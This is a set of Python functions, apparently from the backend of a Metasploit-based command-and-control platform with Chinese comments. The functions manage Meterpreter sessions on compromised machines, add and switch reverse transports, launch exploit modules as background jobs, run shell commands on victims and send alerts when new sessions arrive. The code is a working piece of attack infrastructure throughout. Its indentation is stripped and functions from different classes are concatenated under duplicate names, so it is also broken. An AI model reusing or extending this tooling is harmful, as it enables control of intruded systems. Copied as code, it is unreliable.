def update(sessionid=None, action=None, sleep=0):
if sessionid is None or sessionid <= 0:
context = data_return(306, TRANSPORT_MSG.get(306), {})
return context
if action == "next":
result_flag = RpcClient.call(
Method.SessionMeterpreterTransportNext, [sessionid])
elif action == "prev":
result_flag = RpcClient.call(
Method.SessionMeterpreterTransportPrev, [sessionid])
elif action == "sleep":
result_flag = RpcClient.call(
Method.SessionMeterpreterTransportSleep, [sessionid, sleep])
if result_flag:
reconnect_time = time.time() + sleep
Notice.send_warn(
f'切换Session到休眠 SID:{sessionid} 重连时间: {time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(reconnect_time))}'
)
context = data_return(203, TRANSPORT_MSG.get(203), {})
return context
else:
context = data_return(305, TRANSPORT_MSG.get(305), [])
return context
else:
result_flag = False
if result_flag:
Notice.send_info(f"切换传输完成 SID:{sessionid}")
context = data_return(202, TRANSPORT_MSG.get(202), {})
return context
else:
context = data_return(302, TRANSPORT_MSG.get(302), [])
return context
def write(data=None):
cid = Xcache.get_console_id()
if cid is None:
get_active_console_result = Console.get_active_console()
if get_active_console_result:
cid = Xcache.get_console_id()
else:
return False, None
params = [cid, data + "\r\n"]
result = RpcClient.call(Method.ConsoleWrite, params)
if result is None or result.get("result") == "failure":
get_active_console_result = Console.get_active_console()
if get_active_console_result:
cid = Xcache.get_console_id()
params = [cid, data + "\r\n"]
result = RpcClient.call(Method.ConsoleWrite, params)
if result is None or result.get("result") == "failure":
return False, None
else:
return True, result
else:
return False, result
else:
return True, result
def destory(query_params):
opts = {
"uuid": None,
"transport": None,
"lhost": None,
"lport": None,
"ua": None,
"proxy_host": None,
"proxy_port": None,
"proxy_type": None,
"proxy_user": None,
"proxy_pass": None,
"comm_timeout": None,
"session_exp": None,
"retry_total": None,
"retry_wait": None,
"cert": None,
"luri": None,
}
sessionid = query_params.get("sessionid")
opts["url"] = query_params.get("url")
result_flag = RpcClient.call(Method.SessionMeterpreterTransportRemove,
[sessionid, opts])
if result_flag:
Notice.send_info(f"删除传输 SID:{sessionid}")
context = data_return(204, TRANSPORT_MSG.get(204), {})
return context
else:
context = data_return(304, TRANSPORT_MSG.get(304), [])
return context
def destroy(sessionid=None):
if sessionid is None or sessionid <= 0:
context = data_return(304, Session_MSG.get(304), {})
return context
else:
params = [sessionid]
try:
result = RpcClient.call(Method.SessionStop, params, timeout=12)
if result is None: # 删除超时
Notice.send_success(
f"{Session_MSG.get(202)} SID: {sessionid}")
context = data_return(202, Session_MSG.get(202), {})
return context
elif result.get('result') == 'success':
Notice.send_success(
f"{Session_MSG.get(201)} SID: {sessionid}")
context = data_return(201, Session_MSG.get(201), {})
return context
else:
Notice.send_warning(
f"{Session_MSG.get(301)} SID: {sessionid}")
context = data_return(301, Session_MSG.get(301), {})
return context
except Exception as E:
logger.error(E)
Notice.send_warning(f"{Session_MSG.get(301)} SID: {sessionid}")
context = data_return(301, Session_MSG.get(301), {})
return context
def run(module_type=None, mname=None, opts=None, runasjob=False, timeout=1800):
"""实时运行MSF模块"""
params = [module_type,
mname,
opts,
runasjob,
timeout]
result = RpcClient.call(Method.ModuleExecute, params)
return result
def run_as_job(
module_type,
mname,
opts,
):
"""后台任务方式运行"""
params = [module_type, mname, opts, True, 5]
result = RpcClient.call(Method.ModuleExecute, params)
return result
def get_match_route_for_ipaddress_list(ipaddress_list=None):
if isinstance(ipaddress_list, list) is not True:
return None
if ipaddress_list is []:
return []
params = [ipaddress_list]
result = RpcClient.call(Method.SessionMeterpreterRouteGet, params)
return result
def reset_active_console():
result = RpcClient.call(Method.ConsoleList, [])
if result is None:
Xcache.set_console_id(None)
else:
consoles = result.get("consoles")
if len(consoles) == 0:
pass
else:
for console in consoles: # 删除已知命令行
cid = int(console.get("id"))
params = [cid]
RpcClient.call(Method.ConsoleDestroy, params)
result = RpcClient.call(Method.ConsoleCreate)
if result is None:
Xcache.set_console_id(None)
else:
active_id = int(result.get("id"))
Xcache.set_console_id(active_id)
def tabs(line=None):
cid = Xcache.get_console_id()
if cid is None:
return False, {}
params = [cid, line]
result = RpcClient.call(Method.ConsoleTabs, params)
if result is None or result.get("result") == "failure":
logger.warning("Cid: {}错误".format(cid))
return False, {}
else:
return True, result
def destroy_adv_job(task_uuid=None, job_id=None, broker=None):
try:
if broker == BROKER.post_python_job:
flag = aps_module.delete_job_by_uuid(task_uuid)
if flag is not True:
context = data_return(304, Job_MSG.get(304), {})
return context
else:
context = data_return(204, Job_MSG.get(204), {
"uuid": task_uuid,
"job_id": job_id
})
return context
elif broker == BROKER.post_msf_job:
req = Xcache.get_module_task_by_uuid(task_uuid=task_uuid)
common_module_instance = req.get("module")
Xcache.del_module_task_by_uuid(task_uuid)
params = [job_id]
result = RpcClient.call(Method.JobStop, params)
if result is None:
context = data_return(305, Job_MSG.get(305), {})
return context
if result.get('result') == 'success':
# 发送通知
Notice.send_info("模块: {} {} 手动删除完成".format(
common_module_instance.NAME,
common_module_instance.target_str))
context = data_return(204, Job_MSG.get(204), {
"uuid": task_uuid,
"job_id": job_id
})
return context
else:
context = data_return(304, Job_MSG.get(304), {})
return context
elif broker == BROKER.bot_msf_job:
flag = Xcache.del_bot_wait_by_group_uuid(task_uuid)
if flag is not True:
context = data_return(304, Job_MSG.get(304), {})
return context
else:
context = data_return(204, Job_MSG.get(204),
{"uuid": task_uuid})
return context
else:
context = data_return(304, Job_MSG.get(304), {})
return context
except Exception as E:
logger.error(E)
context = data_return(500, CODE_MSG.get(500), {})
return context
def list_msfrpc_jobs_no_cache():
infos = {}
try:
result = RpcClient.call(Method.JobList)
Xcache.set_msf_job_cache(result)
if result is None:
infos = {}
else:
infos = result
except Exception as E:
logger.error(E)
return infos
def get_active_console():
result = RpcClient.call(Method.ConsoleList, [])
if result is None:
Xcache.set_console_id(None)
return False
else:
consoles = result.get("consoles")
if len(consoles) == 0:
consoles_create_opt = {"SkipDatabaseInit": True, 'AllowCommandPassthru': False}
result = RpcClient.call(Method.ConsoleCreate, [consoles_create_opt])
if result is None:
Xcache.set_console_id(None)
return False
else:
active_id = int(result.get("id"))
Xcache.set_console_id(active_id)
return True
else:
active_id = int(consoles[0].get("id"))
Xcache.set_console_id(active_id)
return True
def session_kill():
cid = Xcache.get_console_id()
if cid is None:
return False, {}
params = [cid]
result = RpcClient.call(Method.ConsoleSessionKill, params)
if result is None:
return False, {}
elif result.get("result") == "failure":
logger.warning("Cid: {}错误".format(cid))
return False, {}
else:
return True, result
def destroy(id=None):
try:
params = [id]
result = RpcClient.call(Method.JobStop, params)
if result is None:
return False
if result.get('result') == 'success':
return True
else:
return False
except Exception as E:
logger.error(E)
return False
def create(ipaddress=None, sessionid=None, user_input=None):
try:
user_input = user_input.strip()
if user_input.startswith('shell'):
command = user_input[len('shell'):]
if len(command) == 0:
new_bufer = "\n{}\n".format(
"Not support switch to Dos/Bash,input like\"shell whoami\" to run os cmd."
)
result = Xcache.add_sessionio_cache(ipaddress, new_bufer)
context = data_return(200, SessionIO_MSG.get(200), result)
return context
else:
user_input = f"shell -c '{command}'"
if user_input.startswith('exit'):
params = [sessionid]
result = RpcClient.call(Method.SessionMeterpreterSessionKill,
params)
context = data_return(203, SessionIO_MSG.get(203), result)
return context
params = [sessionid, user_input]
result = RpcClient.call(Method.SessionMeterpreterWrite, params)
if result is None:
context = data_return(305, SessionIO_MSG.get(305), {})
elif result.get('result') == 'success':
new_bufer = "{}{}\n".format(METERPRETER_PROMPT, user_input)
result = Xcache.add_sessionio_cache(ipaddress, new_bufer)
context = data_return(200, SessionIO_MSG.get(200), result)
else:
context = data_return(305, SessionIO_MSG.get(305), {})
except Exception as E:
logger.error(E)
context = data_return(306, SessionIO_MSG.get(306), {})
return context
def is_msf_job_alive(job_id):
time.sleep(0.5)
try:
result = RpcClient.call(Method.JobList)
Xcache.set_msf_job_cache(result)
if result is None:
return False
else:
if result.get(str(job_id)) is not None:
return True
else:
return False
except Exception as E:
logger.error(E)
return False
def update_service_status():
data = {
'json_rpc': {
'status': False
},
}
# 检查msfrpc服务状态
result = RpcClient.call(method=Method.CoreVersion,
params=None,
timeout=3)
if result is None:
data['json_rpc'] = {'status': False}
logger.warning("json_rpc服务无法连接,请确认!")
else:
data['json_rpc'] = {'status': True}
return data
def update(ipaddress=None, sessionid=None):
old_result = Xcache.get_sessionio_cache(ipaddress)
if sessionid is None or sessionid == -1:
context = data_return(202, SessionIO_MSG.get(202), old_result)
return context
try:
params = [sessionid]
result = RpcClient.call(Method.SessionMeterpreterRead, params)
if result is None or (isinstance(result, dict) is not True):
context = data_return(303, SessionIO_MSG.get(303), old_result)
return context
new_bufer = result.get('data')
result = Xcache.add_sessionio_cache(ipaddress, new_bufer)
context = data_return(200, CODE_MSG.get(200), result) # code特殊处理
except Exception as E:
logger.error(E)
context = data_return(306, SessionIO_MSG.get(405), old_result)
return context
def putin_post_msf_module_queue(msf_module=None):
"""调用msgrpc生成job,放入列表"""
params = [
msf_module.type,
msf_module.mname,
msf_module.opts,
True, # 强制设置后台运行
0 # 超时时间
]
result = RpcClient.call(Method.ModuleExecute, params)
if result is None:
Notice.send_warning(f"渗透服务连接失败,无法执行模块 :{msf_module.NAME}")
return False
elif result == "license expire":
Notice.send_warning(f"License 过期,无法执行模块 :{msf_module.NAME}")
return False
# result 数据格式
# {'job_id': 3, 'uuid': 'dbcb2530-95b1-0137-5100-000c2966078a', 'module': b'\x80\ub.'}
if result.get("job_id") is None:
logger.warning("模块实例:{} uuid: {} 创建后台任务失败".format(
msf_module.NAME, result.get("uuid")))
Notice.send_warning("模块: {} {} 创建后台任务失败,请检查输入参数".format(
msf_module.NAME, msf_module.target_str))
return False
else:
logger.warning("模块实例放入列表:{} job_id: {} uuid: {}".format(
msf_module.NAME, result.get("job_id"), result.get("uuid")))
# 放入请求队列
req = {
'broker': msf_module.MODULE_BROKER,
'uuid': result.get("uuid"),
'module': msf_module,
'time': int(time.time()),
'job_id': result.get("job_id"),
}
Xcache.create_module_task(req)
Notice.send_info("模块: {} {} 开始执行".format(msf_module.NAME,
msf_module.target_str))
return True
def list_transport(sessionid):
tmp_enum_list = Handler.list_handler_config()
result_list = RpcClient.call(Method.SessionMeterpreterTransportList,
[sessionid])
if result_list is None:
transports = []
return {
'session_exp': 0,
'transports': transports,
"handlers": tmp_enum_list
}
else:
result_list["handlers"] = tmp_enum_list
transports = result_list.get("transports")
current_transport_url = None
if len(transports) > 0:
transports[0]["active"] = True
current_transport_url = transports[0].get("url")
i = 0
for transport in transports:
transport["tid"] = i
i += 1
if transport.get("url") == current_transport_url:
transport["active"] = True
if transport.get("cert_hash") is not None:
cert_hash = transport.get("cert_hash")
transport["cert_hash"] = base64.b64encode(
cert_hash.encode("utf-8"))
def get_url(data):
return data.get("url")
transports.sort(key=get_url)
return result_list
def _set_base_info(self):
info = RpcClient.call(Method.SessionGet, [self.sessionid], timeout=3)
if info is None:
return False
# 处理linux的no-user问题
if str(info.get('info')).split(' @ ')[0] == "no-user":
info['info'] = info.get('info')[10:]
self.info = info.get('info')
self.type = info.get('type')
self.session_host = info.get('session_host')
self.session_port = info.get('session_port')
self.target_host = info.get('target_host')
self.tunnel_local = info.get('tunnel_local')
self.tunnel_peer = info.get('tunnel_peer')
self.exploit_uuid = info.get('exploit_uuid')
self.via_exploit = info.get('via_exploit')
self.via_payload = info.get('via_payload')
self.arch = info.get('arch')
self.platform = info.get('platform')
self._session_uuid = info.get('uuid')
self.last_checkin = info.get('last_checkin') // 10 * 10
self.fromnow = (int(time.time()) - info.get('last_checkin')) // 10 * 10
self.tunnel_peer_ip = info.get('tunnel_peer').split(":")[0]
self.tunnel_peer_locate = Geoip.get_city(
info.get('tunnel_peer').split(":")[0])
self.load_powershell = info.get('load_powershell')
self.load_python = info.get('load_python')
routestrlist = info.get('routes')
try:
if isinstance(routestrlist, list):
for routestr in routestrlist:
routestr.split('/')
tmpdict = {
"subnet": routestr.split('/')[0],
'netmask': routestr.split('/')[1]
}
self.route.append(tmpdict)
except Exception as E:
logger.error(E)
try:
self.user = str(info.get('info')).split(' @ ')[0]
self.computer = str(info.get('info')).split(' @ ')[1]
except Exception as _:
return False
else:
try:
self.os = info.get('advanced_info').get("sysinfo").get("OS")
self.os_short = info.get('advanced_info').get("sysinfo").get(
"OS").split("(")[0]
if len(self.os_short) > 18:
self.os_short = f"{self.os_short[0:6]} ... {self.os_short[-6:]}"
except Exception as _:
self.os = None
self.os_short = None
try:
self.is_admin = info.get('advanced_info').get("sysinfo").get(
"IsAdmin")
except Exception as _:
pass
try:
self.logged_on_users = info.get('advanced_info').get(
"sysinfo").get("Logged On Users")
except Exception as _:
pass
try:
self.pid = info.get('advanced_info').get("sysinfo").get("Pid")
except Exception as _:
pass
try:
self.domain = info.get('advanced_info').get("sysinfo").get(
"Domain")
except Exception as _:
pass
self.available = True
return True
def run_with_output(module_type, mname, opts, _timeout=180):
"""实时运行,获取输出"""
params = [module_type, mname, opts, False, _timeout]
result = RpcClient.call(Method.ModuleExecute, params)
return result
def list_portfwd():
result_list = RpcClient.call(Method.SessionMeterpreterPortFwdList)
if result_list is None:
return []
else:
return result_list
def list_sessions():
uuid_msfjobid = {}
msfjobs = Job.list_msfrpc_jobs()
if msfjobs is not None:
for jobid in msfjobs:
datastore = msfjobs[jobid].get("datastore")
if datastore is not None:
uuid_msfjobid[msfjobs[jobid]["uuid"]] = {"job_id": int(jobid),
"PAYLOAD": datastore.get("PAYLOAD"),
"LPORT": datastore.get("LPORT"),
"LHOST": datastore.get("LHOST"),
"RHOST": datastore.get("RHOST")}
sessions_available_count = 0
sessions = []
infos = RpcClient.call(Method.SessionList, timeout=3)
if infos is None:
return sessions
if infos.get('error'):
logger.warning(infos.get('error_string'))
return sessions
sessionhosts = []
for key in infos.keys():
info = infos.get(key)
if info is not None:
one_session = {}
try:
one_session['id'] = int(key)
except Exception as E:
logger.warning(E)
continue
# 处理linux的no-user问题
if str(info.get('info')).split(' @ ')[0] == "no-user":
info['info'] = info.get('info')[10:]
one_session['type'] = info.get('type')
one_session['session_host'] = info.get('session_host')
one_session['tunnel_local'] = info.get('tunnel_local')
one_session['tunnel_peer'] = info.get('tunnel_peer')
one_session['tunnel_peer_ip'] = info.get('tunnel_peer').split(":")[0]
one_session['tunnel_peer_locate'] = Geoip.get_city(info.get('tunnel_peer').split(":")[0])
one_session['via_exploit'] = info.get('via_exploit')
one_session['exploit_uuid'] = info.get('exploit_uuid')
if uuid_msfjobid.get(info.get('exploit_uuid')) is None:
one_session['job_info'] = {"job_id": -1,
"PAYLOAD": None,
"LPORT": None,
"LHOST": None,
"RHOST": None}
else:
one_session['job_info'] = uuid_msfjobid.get(info.get('exploit_uuid'))
one_session['via_payload'] = info.get('via_payload')
one_session['tunnel_peer_ip'] = info.get('tunnel_peer').split(":")[0]
one_session['tunnel_peer_locate'] = Geoip.get_city(info.get('tunnel_peer').split(":")[0])
one_session['uuid'] = info.get('uuid')
one_session['platform'] = info.get('platform')
one_session['last_checkin'] = info.get('last_checkin') // 5 * 5
one_session['fromnow'] = (int(time.time()) - info.get('last_checkin')) // 5 * 5
one_session['info'] = info.get('info')
one_session['arch'] = info.get('arch')
try:
one_session['user'] = str(info.get('info')).split(' @ ')[0]
one_session['computer'] = str(info.get('info')).split(' @ ')[1]
except Exception as _:
one_session['user'] = "******"
one_session['computer'] = "Initializing"
one_session['advanced_info'] = {"sysinfo": {}, "username": "******"}
one_session['os'] = None
one_session['load_powershell'] = False
one_session['load_python'] = False
one_session['routes'] = []
one_session['isadmin'] = False
one_session['available'] = False # 是否初始化完成
sessions.append(one_session)
continue
one_session['load_powershell'] = info.get('load_powershell')
one_session['load_python'] = info.get('load_python')
one_session['advanced_info'] = info.get('advanced_info')
try:
one_session['os'] = info.get('advanced_info').get("sysinfo").get("OS")
one_session['os_short'] = info.get('advanced_info').get("sysinfo").get("OS").split("(")[0]
except Exception as _:
one_session['os'] = None
one_session['os_short'] = None
try:
one_session['isadmin'] = info.get('advanced_info').get("sysinfo").get("IsAdmin")
if info.get('platform').lower().startswith('linux'):
if "uid=0" in one_session['info'].lower():
one_session['isadmin'] = True
except Exception as _:
one_session['isadmin'] = None
routestrlist = info.get('routes')
one_session['routes'] = []
try:
if isinstance(routestrlist, list):
for routestr in routestrlist:
routestr.split('/')
tmpdict = {"subnet": routestr.split('/')[0], 'netmask': routestr.split('/')[1]}
one_session['routes'].append(tmpdict)
except Exception as E:
logger.error(E)
one_session['available'] = True
sessions.append(one_session)
# session监控统计信息
sessionhosts.append(info.get('session_host'))
sessions_available_count += 1
def split_ip(ip):
try:
result = tuple(int(part) for part in ip.split('.'))
except Exception as E:
logger.exception(E)
return 0, 0, 0
return result
def session_host_key(item):
return split_ip(item.get("session_host"))
sessions = sorted(sessions, key=session_host_key)
# session监控功能
if Xcache.get_sessionmonitor_conf().get("flag"):
if Xcache.get_session_count() < sessions_available_count:
Notice.send_sms(f"当前Session数量: {sessions_available_count} IP列表: {','.join(sessionhosts)}")
Notice.send_info(f"当前Session数量: {sessions_available_count}")
if Xcache.get_session_count() != sessions_available_count:
Xcache.set_session_count(sessions_available_count)
return sessions
def create(sessionid=None, handler=None):
# 获取不同转发的默认参数
try:
handleropts = json.loads(handler)
except Exception as E:
logger.warning(E)
context = data_return(303, TRANSPORT_MSG.get(303), [])
return context
opts = {
"uuid": None,
"transport": None,
"lhost": None,
"lport": None,
"ua": None,
"proxy_host": None,
"proxy_port": None,
"proxy_type": None,
"proxy_user": None,
"proxy_pass": None,
"comm_timeout": None,
"session_exp": None,
"retry_total": None,
"retry_wait": None,
"cert": None,
"luri": None,
}
handler_payload = handleropts.get("PAYLOAD")
if "reverse_tcp" in handler_payload:
opts["transport"] = "reverse_tcp"
elif "reverse_https" in handler_payload:
opts["transport"] = "reverse_https"
elif "reverse_http" in handler_payload:
opts["transport"] = "reverse_http"
elif "bind_tcp" in handler_payload:
opts["transport"] = "bind_tcp"
else:
context = data_return(303, TRANSPORT_MSG.get(303), [])
return context
opts["uuid"] = handleropts.get("PayloadUUIDSeed")
opts["lhost"] = handleropts.get("LHOST")
opts["lport"] = handleropts.get("LPORT")
opts["ua"] = handleropts.get("HttpUserAgent")
opts["proxy_host"] = handleropts.get("HttpProxyHost")
opts["proxy_port"] = handleropts.get("HttpProxyPort")
opts["proxy_type"] = handleropts.get("HttpProxyType")
opts["proxy_user"] = handleropts.get("HttpProxyUser")
opts["proxy_pass"] = handleropts.get("HttpProxyPass")
opts["comm_timeout"] = handleropts.get("SessionCommunicationTimeout")
opts["session_exp"] = handleropts.get("SessionExpirationTimeout")
opts["retry_total"] = handleropts.get("SessionRetryTotal")
opts["retry_wait"] = handleropts.get("SessionRetryWait")
opts["cert"] = handleropts.get("HandlerSSLCert")
opts["luri"] = handleropts.get("LURI")
result_flag = RpcClient.call(Method.SessionMeterpreterTransportAdd,
[sessionid, opts])
if result_flag:
Notice.send_success(f"新增传输 SID:{sessionid}")
context = data_return(201, TRANSPORT_MSG.get(201), {})
return context
else:
context = data_return(301, TRANSPORT_MSG.get(301), [])
return context
def list_route():
result = RpcClient.call(Method.SessionMeterpreterRouteList)
if result is None:
return []
return result
